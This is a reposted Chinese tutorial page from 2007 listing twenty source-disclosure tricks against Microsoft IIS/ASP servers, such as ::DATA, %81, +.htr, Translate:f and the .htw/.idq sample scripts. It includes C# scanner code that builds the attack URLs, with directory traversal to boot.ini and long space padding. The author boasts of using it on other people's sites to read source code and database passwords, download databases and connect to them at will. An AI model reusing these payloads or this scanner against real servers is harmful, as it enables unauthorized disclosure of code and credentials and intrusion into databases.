20种看ASP程序源码的方法及工具

首页

会员注册

文章探索: 分类: 关键字:

+ 栏目导航

ASP教程	C#教程
JSP教程	VB教程
PHP教程	ACCESS教程
XML教程	FLASH教程
SQL教程	ASP.NET教程
java教程	JavaScript教程
SEO网站优化	网站网络营销

+ 相关文章

用ASP调用SQL Server的视图和存储过程

一个投票系统的源程序(coveryourasp.c..

列出服务器上的打印机

技术教程 -> ASP教程 ->

20种看ASP程序源码的方法及工具

来源：转载人气：971 录入时间：2007-11-8

    　众所周知Windows平台漏洞百出，补丁一个接一个，但总是补也补不净。我把我所知道的20种看ASP源码的方法总结了一下，并且用C#写了个应用程序来扫描这些漏洞，发现虽然大部分的方法已经不起做用，但还是有一些漏网之鱼的：），结果这两天真看到不少站的源代码，包括数据库密码，如果用Access的可以把库下载下来，而用SQL Server的如果不是用udl,dsn等来连接的话，也可以通过tcp/ip网络库连接到数据库，为所欲为呀。先面把这20种方法列在下面：

    .
    %81
    ::DATA
    %2e
    %2e%41sp
    +.htr
    \\
    longhtr
    .bak
    codebrws.asp
    showcode.asp
    null.htw
    qfullhit.htw
    qsumrhit.htw
    query.idq
    search/qfullhit.htw
    search/qsumrhit.htw
    iirturnh.htw
    .htw
    Translate:f

    　　上边这些漏洞前面10几条是通过在asp文件后直接加上，如%81就是xxx.asp%81，后面这些都是通过iis自带的例子或系统漏洞实现的，最特别的是那种translate:f方法，它直接通过浏览器是无法使用的，必须同服务器建立tcp/ip的socket连接，发送请求才行，具体每个漏洞如何使用，看下面，这是我那个应用程序的一部分，如果你要全部的可以到我的站点去下载。

    switch (this.cboMethod.SelectedIndex)
    {
    case 0: //直接读取
    strRequestFile = strServer + strUrl ;
    break ;
    case 5 : //%2e%41sp
    strRequestFile = strServer + strPath + strFirst
    + "%2e%41sp" ;
    break ;
    case 8 : //longhtr
    strRequestFile = strServer + strUrl
    + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
    + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
    + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr" ;
    break ;

    case 10: //codebrws.asp
    strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
    + strUrl ;
    break ;

    case 11: //showcode.asp
    strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
    + "/msadc/../../../../boot.ini" ;
    break;

    case 12 : //null.htw
    strRequestFile = strServer + "/null.htw?CiWebHitsFile="
    + strUrl + "%20&CiRestriction=none&CiHiliteType=Full" ;
    break ;
    case 13 : //qfullhit.htw
    strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
    + "&CiHiliteType=Full";
    break ;

    case 14 : //qsumrhit.htw
    strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
    + "&CiHiliteType=Full";
    break ;

    case 15 : //query.idq
    strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
    + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
    break ;

    case 16: //search/qfullhit.htw
    strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
    + "&CiHiliteType=Full";
    break ;

    case 17: // search/qsumrhit.htw
    strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
    + "&CiHiliteType=Full";
    break ;

    case 18: //iirturnh.htw
    strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
    + "&CiHiliteType=Full";
    break ;

    case 19: //.htw
    strRequestFile = strServer + strUrl
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
    + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
    + "%20%20%20%20%20%20%20%20%20%20%20.htw?"
    + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
    + "&CiHiliteType=Full" ;
    break ;

    default:
    strRequestFile = strServer + strUrl + this.cboMethod.Text ;
    }

[关闭窗口]

公司地址: 广州市荔湾区东漖北路560号511室

电话:020-81803473 传真:020-81544987